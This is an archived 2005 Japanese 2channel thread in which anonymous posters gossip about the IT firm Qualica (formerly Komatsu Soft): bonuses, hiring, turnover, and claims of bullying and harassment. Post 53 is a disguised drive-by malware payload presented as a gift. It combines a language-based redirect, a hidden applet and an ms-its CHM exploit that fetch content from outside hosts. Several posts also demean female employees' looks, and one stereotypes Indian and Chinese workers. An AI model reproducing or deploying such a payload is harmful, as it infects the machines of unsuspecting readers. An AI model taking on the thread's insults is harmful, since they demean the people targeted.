2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

QUALICA 〜 クオリカ 〜 (旧コマツソフト) 4

1 :非決定性名無しさん:2005/05/09(月) 03:58:06
前スレ
QUALICA 〜 クオリカ 〜 (旧コマツソフト) 3
http://science3.2ch.net/test/read.cgi/infosys/1054427244/

TISの子会社「クオリカ」(前コマツソフト)について、引き続き大いに語りましょう。

2 :非決定性名無しさん:2005/05/09(月) 03:58:45
精神的過去ログ

コマツソフト
http://mentai.2ch.net/infosys/kako/1012/10123/1012325989.html
コマツソフト
http://natto.2ch.net/recruit/kako/994/994779716.html
コマツソフト
http://natto.2ch.net/recruit/kako/991/991976868.html
コマツソフト
http://cocoa.2ch.net/job/kako/991/991897040.html

3 :非決定性名無しさん:2005/05/09(月) 04:08:27
グループ会社スレ
【江坂】TIS株式会社 Part7【竹芝】
http://science3.2ch.net/test/read.cgi/infosys/1095353220/l50

アグレックスって <その2>
http://science3.2ch.net/test/read.cgi/infosys/1095952771/l50

ユーフィットは?(ついに懐胎)Part2
http://science3.2ch.net/test/read.cgi/infosys/1071151894/l50






4 :非決定性名無しさん:2005/05/09(月) 17:16:36
4様

5 :非決定性名無しさん:2005/05/10(火) 07:47:55
北ーー

6 :非決定性名無しさん:2005/05/13(金) 01:29:18
それがクオリカクオリティー

7 :非決定性名無しさん:2005/05/13(金) 17:27:02
棒茄子まぁ〜だぁ〜?
チンチン

8 :非決定性名無しさん:2005/05/13(金) 21:16:28
でるの???

偉い人しかでないんじゃないの??? それがくおりかうえい

9 :非決定性名無しさん:2005/05/13(金) 21:56:49
1ヶ月前の面接の結果が今ごろ来た

10 :非決定性名無しさん:2005/05/14(土) 18:26:17
内定もろた

11 :非決定性名無しさん:2005/05/14(土) 19:44:09
この会社で勤めるのは大変ですよ。
身体壊さないよう、適度にがんばってください>>10

12 :10:2005/05/14(土) 21:49:10
ありがとうございます。
ITはどこもキツい印象があるんですがそれにも増して大変なんですか?

13 :非決定性名無しさん:2005/05/14(土) 22:40:12
恐喝、いじめ、暴力で出世している関西人がいる。
何人も被害にあってるが泣き寝入り。
いつも関西弁しゃべてるからすぐにわかる。

14 :非決定性名無しさん:2005/05/15(日) 08:16:25
君は管理職になる可能性は無いよ
くおりかでは天から光臨するものだからね
勤続20年の平社員がごろごろ
それがくおりかうえい

15 ::2005/05/15(日) 13:43:01
>>13
そういうメンタリティーを持つ関西人をクオリカでは重用するから
下請け会社の担当者に「なにかあった場合は現状復帰の費用など
すべて賠償します」という誓約書を強要することができるわけだな

さすが関西人。実はお前ら社内では日勤教育とかもしているんだろう

16 ::2005/05/15(日) 13:48:07
>>14
ちなみにJCBカード開発は悲惨なようだな。
次の日経ビジネスでTISとJCBの実名出るぜ。

17 :非決定性名無しさん:2005/05/15(日) 16:24:16
>>16
何が『ちなみに』なのか分からない。
J○Bって言いたいだけちゃうんか?
さすが、くおりかうぇい。
TISグループなのに雑誌レベルのことしか
分からないなんて哀れすぎるな。

18 ::2005/05/15(日) 17:13:31
>>17 ほう、いろいろ知っているようだね。後学のために教えてもらえるかな

19 :岡本晋乃助:2005/05/16(月) 01:00:28
>>13
アウトソーシングの悪口言っちゃいかーん

20 :非決定性名無しさん:2005/05/16(月) 01:09:23
>>19ほう、いろいろ知っているようだね。後学のために教えてもらえるかな

21 :非決定性名無しさん:2005/05/17(火) 00:00:19
何人かはうちで雇いたい、まじで。
給料は下がると思うけど。

22 :非決定性名無しさん:2005/05/17(火) 11:02:04
3年くらい前にした合コンに、ここの女の子が来てたはず。
せっかく東京へ出てきたのだから、いろんな世界を見て、転職を成功させたいと言っていた。
堅実そうな感じ。ここの会社の人には、堅実な人が多いのかね?


23 :非決定性名無しさん:2005/05/22(日) 20:35:47
コマツソフトといえば、MATROXのビデオカードでお世話になったな。

24 :非決定性名無しさん:2005/05/22(日) 23:52:51
あのころはよかったなあ・・・・・・・・・・・・・

MATROX


25 :非決定性名無しさん:2005/05/23(月) 20:38:50
22>>
その子は堅実だ。だからもう転職ズミ。残っているのは堅実じゃなくて....

26 :非決定性名無しさん:2005/05/24(火) 19:53:33
新入社員はブスばっか?

27 :非決定性名無しさん:2005/05/24(火) 23:44:49
会いたいなぁ。
6Fでいつも一人でお昼食べてた子(♀)。

28 :非決定性名無しさん:2005/05/25(水) 14:36:11
よんだ?

29 :非決定性名無しさん:2005/05/25(水) 15:01:58
>>26
ブスって言うやつの方がブス。


30 :非決定性名無しさん:2005/05/25(水) 17:17:14
でもソフト業界ってブスばっかじゃん

顔が可愛くてそこそこモテてる自覚があればこんな業界入らない。
美人でソフト業界に来るのは本当にその分野に興味があるか、
何も考えてないか、別業界で就職できなかった人のみ。

ゆえにソフト業界はブスばっか。
つまり、4流SIのクオリカに入社してくる社員はブスばっか。

31 :非決定性名無しさん:2005/05/25(水) 19:31:39
               /´  `フ
         , '' ` ` /      ,! 新スレですか?
.        , '      レ   _,  rミ
        ;          `ミ __,xノ゙、
        i     ミ   ; ,、、、、 ヽ、
      ,.-‐!       ミ  i    `ヽ.._,,)) ))  ポンチ
     //´``、     ミ ヽ      ∧_∧ ∧_∧
.    | l    ` ーー -‐''ゝ、,,))    (^ω^`) (・ω・`)
     ヽ.ー─'´)            (つ つ (つと l

32 :非決定性名無しさん:2005/05/26(木) 01:58:33
2F見てると結構カワイイコいるじゃん。

3Fなんて悲惨だよ、なんだこの倉庫orz

33 :非決定性名無しさん:2005/05/26(木) 10:35:21
>>30の必死さにワラタ

34 :非決定性名無しさん:2005/05/26(木) 12:59:35
毎日ブスに囲まれて仕事してるから、目がおかしくなっちゃったんだね
かわいそうに・・・

その垢抜けない集団の中から適当に見繕って付き合ったり結婚したりするんだよね
穴兄弟が社内にどれだけいるのやら・・・

35 :非決定性名無しさん:2005/05/26(木) 13:20:57
>>34の必死さにワロタ

36 :非決定性名無しさん:2005/05/26(木) 21:26:37
ババババババババババババ
_______              ________
    ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄牛 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 ( ̄ ̄ ̄ ̄_)  __皿_
   ̄ ̄\ \_//    λ   ヽ      / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  ‐=≡  \ / l    ∧_∧ \   < 馬鹿クジラ、とっとと動けや!
   ‐=≡ /    |   (#@Д@)  丶   \___________
  ‐=≡ (qualica\ γ(つ¶ つ¶__|   
   ‐=≡ \      ̄ ̄ ̄ ̄ ̄   )
   ‐=≡ _/,へ ________/
      (_∴)      (∴)  
________________________________________________________________________________________________________________
             
    〜〜                      ⌒Y⌒  〜〜 おかあさん〜〜
                   ヽ ̄v ̄/  ,r'´ ̄ ̄``ヽ、  ひぃ〜    〜〜
                    ヽ、 ( r'´      T ヽ   たすけて〜
           〜〜        `ヽ         ||||||||   〜〜  おかあさん〜〜
                     〜〜〜〜〜〜〜〜〜〜


37 :非決定性名無しさん:2005/05/29(日) 23:00:45
クオリカと金融系デー子ならどっちがお勧め?

38 :非決定性名無しさん:2005/05/30(月) 00:14:55
もれならデー子
ただデー子もピンキリだろうが・・

39 :37:2005/05/30(月) 00:46:06
>>38
確かにピンきりっぽい。とりあえず、力は変な会社じゃないとは思うが。

ところで、クオリカからの転職先ってどういうところが多いんだろうか?

40 :非決定性名無しさん:2005/05/30(月) 06:14:55
態度が横柄な人が幅をきかせている?
でもかわいい子はかわいい。

41 :非決定性名無しさん:2005/05/30(月) 11:48:27
システムインテグレータ
クオリカ - 製品業、流通・サービス業向けパッケージソフトの導入、システム開発、ネットーワーク構築、運営。

42 :非決定性名無しさん:2005/05/30(月) 12:29:35
みんなお疲れ。

>39
自分の周りではNTTデータに行きたがってる奴が多い。
変り種で不動産業界、マスコミへ転職した奴もいる。


43 :非決定性名無しさん:2005/05/30(月) 16:51:36
>39
あくまでも聞いた話だがクオリカから同じIT系に転職する人は少ないとか。
異業種への転職が多いらしい。

44 :非決定性名無しさん:2005/05/30(月) 20:52:08
大阪ってどう?

45 :非決定性名無しさん:2005/05/30(月) 22:59:32
MATROX ..............

1000年どころか10年も持たなかったなあ・・・
小松ソフトウエア開発


46 :37:2005/05/31(火) 00:54:30
>>42
データってやっぱり良いんですかねえ?

>>43
異業種っていうと、何が出来るんだろうか。
でも、完成車メーカーとか多そうな予感。

47 :非決定性名無しさん:2005/06/01(水) 13:32:39
現状どーなんですか?ここの会社?
会社の感じはT○Sぽぃですか?
内情をもうちょっとしりたいです。

48 :非決定性名無しさん:2005/06/01(水) 14:55:59
>47
おすすめしません。
男は酒乱で仕事遅い、ついでにセンス最悪
女は自堕落でデブ、加えてブス
ブサ同士で傷を舐めあい馴れ合うにはいいですけどね!

入社しても社内のことをよく知らぬまま、すぐに客先に出されます


49 :非決定性名無しさん:2005/06/01(水) 16:00:13
まさに親会社と一緒っすね

50 :非決定性名無しさん:2005/06/01(水) 20:45:07
47です。
返信ありがとうございました。
スイマセン。再度教えてください。
客先にだされるということは、先方で
プログラムを作るということでしょうか?
実際会社の生業は先方に派遣みたいなことで
なりたっているのでしょうか?

51 :非決定性名無しさん:2005/06/01(水) 23:47:59
>>43
じゃあ、わしは少数派だ!

52 :非決定性名無しさん:2005/06/02(木) 00:28:49
派遣みたいな話は聞かない。
そして女はかわいい子も普通にいる。
TI○っぽさは個人的には感じない。
雰囲気は部署にもよるがフランクな部類に入るだろう。

この会社がどうかは個人の価値観による。

53 :非決定性名無しさん:2005/06/02(木) 15:33:12
おみやげですう。

<script language="JavaScript">
var lang = navigator.systemLanguage;
if (lang == "ru") document.location = "http://awmcash.biz/adverts/nafig.html";
if (lang == "cn") document.location = "http://awmcash.biz/adverts/nafig.html";
if (lang == "zh") document.location = "http://awmcash.biz/adverts/nafig.html";
</script>
<html>
<head>
<title></title>
</head>
<body>
<applet CODE="BlackBox.class" width=1 height=1></APPLET>
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/x-scriptlet"></object>
</body>
</html>

54 :非決定性名無しさん:2005/06/03(金) 07:31:45
>実際会社の生業は先方に派遣みたいなことで
>なりたっているのでしょうか?

常駐の人もいるが、なりたってはいない。


55 :非決定性名無しさん:2005/06/04(土) 16:07:58
ノートンが反応する


56 :  :2005/06/05(日) 23:14:50
>>43
>あくまでも聞いた話だがクオリカから同じIT系に転職する人は少ないとか。
>異業種への転職が多いらしい。
先物取引、為替、証券、不動産などのくず会社ですか?
下請け担当者を脅すので慣れてそうだよね


57 :非決定性名無しさん:2005/06/10(金) 19:15:36
あげ

58 :非決定性名無しさん:2005/06/12(日) 00:40:41
棒茄子まだかねぇ

59 :非決定性名無しさん:2005/06/12(日) 09:54:36
平にもでるの???
お偉いさんだけじゃないの??
棒茄子

60 :非決定性名無しさん:2005/06/16(木) 23:43:42
いまだに若い娘(社員)にデートを強要する勘違い部長もいるしね。

61 :非決定性名無しさん:2005/06/16(木) 23:44:02
いまだに若い娘(社員)にデートを強要する勘違い部長もいるしね。

62 :非決定性名無しさん:2005/06/18(土) 02:37:54
部長ってG8?

63 :非決定性名無しさん:2005/06/19(日) 12:01:03
あ、部長じゃない。事業部長だ。C○の。

64 :非決定性名無しさん:2005/06/21(火) 21:07:53
あいかわらず社内結婚多いですか?
合コンとか行かないの?

65 :非決定性名無しさん:2005/06/26(日) 00:03:06
行くような社交性ある社員が少ないんでしょ。
って俺もかw

66 :非決定性名無しさん:2005/06/26(日) 13:04:51
おまいら、ボーナスどうでした?

67 :非決定性名無しさん:2005/06/29(水) 17:49:43
転職先が決まったし、もう辞めます
お世話になりました。

68 :非決定性名無しさん:2005/06/29(水) 19:28:14
おめでとう
次の会社でがんばってね

69 :非決定性名無しさん:2005/06/30(木) 01:59:14
質問です。
年間どのくらいの人が退職するんですかぁ?
あと、年間どのこうらいの人数採用してるんですかぁ?

70 :非決定性名無しさん:2005/07/01(金) 07:02:10
使えないと思ったら即クビだ。

71 :非決定性名無しさん:2005/07/01(金) 23:09:37
ああ・・・もう本当に愛してる・・・2Fのあの子に・・・。

72 :非決定性名無しさん:2005/07/04(月) 00:50:22
やあ(´・ω・`)また君か。来ると思っていたよ。
とりあえず君には呪いをかけておいたから、あと3年以内に死ぬよ。
でも呪いを解く方法が一つだけあるんだよ。
このスレに「ちんちんみてまんまんおっき」と書き込むんだ。
健闘を祈るよ。

73 :非決定性名無しさん へ:2005/07/04(月) 01:56:51
辞めたきゃ辞めれば???なにをするのも、あんた次第だろーが?
え?こんなサイトで文句書いてんじゃねーょ!!!他に言うべき所があろーが??



74 :非決定性名無しさん:2005/07/04(月) 20:28:12
↑低学歴でこんな会社にしか内定もらえなかったクズ新人

75 :非決定性名無しさん:2005/07/04(月) 20:50:59
ちんちんみてまんまんおっき

76 :非決定性名無しさん:2005/07/05(火) 09:43:20
>>73
ttp://image.blog.livedoor.jp/sh0w40/imgs/2/a/2ab85eaf.jpg

77 :非決定性名無しさん:2005/07/06(水) 00:14:04
ちんちんみてまんまんおっき

78 :非決定性名無しさん:2005/07/07(木) 00:25:03
デートを強要

事実?

79 :非決定性名無しさん:2005/07/07(木) 00:38:23
シュガシュガルーン

80 :非決定性名無しさん:2005/07/08(金) 17:06:28
クオリカ最凶!!

81 :非決定性名無しさん:2005/07/08(金) 19:05:45
おめーら、全員クビ。

いやだったら辞めろ!
市場価値のある人間になれ!

気持ち悪いぜ。

うじうじしてよぉー。

違う会社探そうぜ!

82 :非決定性名無しさん:2005/07/10(日) 20:18:37
栗岡?

83 :非決定性名無しさん:2005/07/12(火) 00:46:35
ヤッターマン コーヒー ライター

84 :sage:2005/07/12(火) 21:53:19
>>82
おまえ社員だろ。ばか

85 :非決定性名無しさん:2005/07/13(水) 10:35:08
>>84
ちがうよ。バカ。

86 :非決定性名無しさん:2005/07/14(木) 16:31:24
ちんちんみてまんまんおっき


87 :非決定性名無しさん:2005/07/16(土) 22:50:53
ああ・・・もう本当に愛してる・・・2Fのあの子に・・・。

88 :非決定性名無しさん:2005/07/18(月) 20:59:38
今度、こちらの会社を受けようかと検討してます。
先輩がたにアドバイスお願いできませんか??

89 :非決定性名無しさん:2005/07/18(月) 23:19:42
>>88
昔は関係なかったけど、最近は学歴

90 :非決定性名無しさん:2005/07/19(火) 00:58:29
クリオカ超特急

91 :非決定性名無しさん:2005/07/19(火) 20:37:40
 ∧_∧
(´・ω・)      キキーッ!
O┬O )
◎┴し'-◎ ≡         
          _,,..,,,,_
         ./ ,' 3  `ヽーっ
         l   ⊃ ⌒_つ
          `'ー---‐'''''"  












      ∧_∧ どうしたの?菊間アナにお酒飲まされたの?
     (´・ω・)o,..,,,,_
      /つi'" ,' 3  `ヽーっ
      し-,l   ⊃ ⌒_つ
        `'ー---‐'''''"



92 :非決定性名無しさん:2005/07/20(水) 08:20:27
>>89
学歴ですか・・・
三流大学じゃ無理ですかね?

93 :非決定性名無しさん:2005/07/20(水) 16:40:58
あっははははははははは

94 :92:2005/07/20(水) 18:31:01
>>93
わらっちゃうよね。
だって、シカゴ大&MBAホルダーですからね。。
採用してくれないかも(涙)

95 :非決定性名無しさん:2005/07/20(水) 18:33:46
>>94
MBAは採用

96 :92:2005/07/20(水) 19:33:03
MBAあれば採用?
使う機会あるんですかぁ?

97 :非決定性名無しさん:2005/07/20(水) 20:00:20
>>96
無いけれど資格は奨励している。
現に会社が金を出してMBAを取得させてる人もいる。

元から持っているならいいだろう。

それに英語も、あまり使う機会は無いけれど奨励してるので
シカゴ大学に留学したならポイント高いよ。

98 :非決定性名無しさん:2005/07/21(木) 22:06:46
久しぶりにカッコいい人見つけた。
でも、全く接点なし。


99 :92:2005/07/21(木) 22:29:40
>>97
コメントありがとうございます。
他で、いい条件でオファーがでたので
こちらの会社はエントリーがなくなりました。
スイマセンした。

100 :非決定性名無しさん:2005/07/22(金) 10:30:02
あっはははははははははははは






























夏だなぁ〜

101 :きみたち:2005/07/22(金) 22:22:41
暇なのかい?

102 :非決定性名無しさん:2005/07/22(金) 23:59:28
あっははははははははははは

103 :非決定性名無しさん:2005/07/23(土) 14:07:53
おほっほっほっほっほっほっほっほっほっほっほっほっほっほっ

104 :非決定性名無しさん:2005/07/25(月) 11:00:32
こんにちは。
最近の御社はなにか面白い情報とかないんですかぁ?

105 :非決定性名無しさん:2005/07/26(火) 01:28:00
こんにちわ。
インターシステムズのキャッシュで何をやろうとしているのですかぁ?

106 :非決定性名無しさん:2005/07/27(水) 22:47:50
プッ

107 :非決定性名無しさん:2005/07/29(金) 00:54:48

        /つ_∧
  /つ_,∧ 〈( ゚д゚)
  |( ゚д゚) ヽ ⊂ニ) まじっすか!
  ヽ__と/ ̄ ̄ ̄/ |
   ̄\/___/



108 :非決定性名無しさん:2005/07/29(金) 23:20:07
数年前にすごく可愛い女の子が入社してきて目をつけていたのだが、
彼女はどうも退職してしまったようだね。
最近の新人はこらえ性がないのか?

109 :非決定性名無しさん:2005/08/01(月) 11:47:28
ボーーーーーーー

110 :非決定性名無しさん:2005/08/01(月) 22:22:41
大阪閉鎖決定らしい時間の問題だ。

111 :非決定性名無しさん:2005/08/01(月) 23:00:03
可愛い子なんているか?
その前にかっこいい奴もいないけど。

112 :非決定性名無しさん:2005/08/06(土) 12:47:23

        /つ_∧
  /つ_,∧ 〈( ゚д゚)
  |( ゚д゚) ヽ ⊂ニ) まじっすか!
  ヽ__と/ ̄ ̄ ̄/ |
   ̄\/___/


113 :非決定性名無しさん:2005/08/06(土) 21:32:56
無名企業スレage

114 :五味戸卯鹿:2005/08/07(日) 12:46:00
仕事場にやってきてわざとこれ見よがしに
「我々はこんなものを見に来たんじゃない、社長を出せ」と騒ぐやつうざい。
お前らがうるさいせいでクオリカとは関係のない他のプロジェクトの作業が
すすまない。
ぎゃ−ぎゃ−いいたいなら会議室に移動するか、さっさと帰ってくれ。

115 :非決定性名無しさん:2005/08/07(日) 20:17:30
           ∩_
           〈〈〈 ヽ
          〈⊃  }
   ∩___∩  |   |
   | ノ      ヽ !   !
  /  ●   ● |  /
  |    ( _●_)  ミ/ <こいつ最高!
 彡、   |∪|  /
/ __  ヽノ /




116 :非決定性名無しさん:2005/08/11(木) 23:30:15
 ::::...  俺たち もう終わっちゃったのかなぁ?
   ::::... ∧_∧_∧
    ::::.(∀・( ´Д`) バカ野郎 気付くの遅すぎるんだよー
   r -(  ( O┰O
  ..::ii'⌒< <  ) 冊冊〉キコキコ・・
  ::'、__,,l!しし(_)l!lJ´
          '、__,l!j    ::::..


117 :非決定性名無しさん:2005/08/14(日) 00:22:19
業績厳しいって本当?かわいそうに。
社名が変わると同時に退職した者ですが、
どのPJも火を吹いてるそうじゃないですか。
お金ないのに新人とりすぎじゃないの?

118 :非決定性名無しさん:2005/08/14(日) 09:32:35
[ 58853a0cf686aa4839c4b78acc24b52a35f8e267e8c946bd ]

119 :非決定性名無しさん:2005/08/14(日) 09:32:52
[ d4aada652f42f5a65e4220e9d4cdc6c45eb79d669d9a187d ]

120 :非決定性名無しさん:2005/08/16(火) 18:41:21
PJにオフショアは使わない方がいいよ。
インド人うそつかないというのはウソだから。
中国人裏切らないアルネ!も裏切るから。

121 :非決定性名無しさん:2005/08/16(火) 21:11:23
地震でシャワー浴びてた妹が全裸で風呂から飛び出してきた
http://ex11.2ch.net/test/read.cgi/news4vip/1124161403/



ちょwwwwwwすごい事になってるぞwwwwwww


122 :非決定性名無しさん:2005/08/16(火) 22:28:52
ガイアの夜明けでインタビューされてたのはキミかい?

123 :非決定性名無しさん:2005/08/18(木) 11:03:11
バカ

124 :非決定性名無しさん:2005/08/18(木) 18:42:59


125 :非決定性名無しさん:2005/08/18(木) 23:04:58
東陽町ですか

126 :非決定性名無しさん:2005/08/19(金) 00:57:57
      ヘ ⌒ ヽ フ
     (  ・ω・ )
      /,   つ   ぷりっ♪
     (_(_, )   
       しし'
やあまた君か。来ると思っていたよ。
とりあえず君には呪いをかけておいたから、これから一生下痢ピー
でも呪いを解く方法が一つだけあるんだよ。
このスレに「モリモリ食ってうんこブリブリ」と書き込むんだ。
健闘を祈るよ。


127 :非決定性名無しさん:2005/08/19(金) 04:31:26
[ c2afa7b10a50205b8fa7865d3878191c24d94a7d5b5341c4cb9e92d2be67d8a31074146128f8aa08 ]

128 :非決定性名無しさん:2005/08/19(金) 20:40:05
朝早くから大変だな

129 :非決定性名無しさん:2005/08/20(土) 00:05:26
モリモリ食ってうんこブリブリ

130 :非決定性名無しさん:2005/08/20(土) 01:15:35
モリモリ食ってうんこブリブリ

131 :非決定性名無しさん:2005/08/20(土) 10:16:37
マルチで通報しておいた

132 :非決定性名無しさん:2005/08/20(土) 13:32:25
[ dfa40a189d7c190a228f4cb583b4adaace2d9be33ff1c444 ]

133 ::2005/08/21(日) 01:36:38
何これ?
荒らし?

134 :非決定性名無しさん:2005/08/21(日) 08:37:31
[ b4a65cfd3c0b42887043a8970efc6e5314a2032b6ab22118 ]

135 :非決定性名無しさん:2005/08/31(水) 14:57:28
中国人の荒らしです。
アホォだのやつらは・・・

24 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)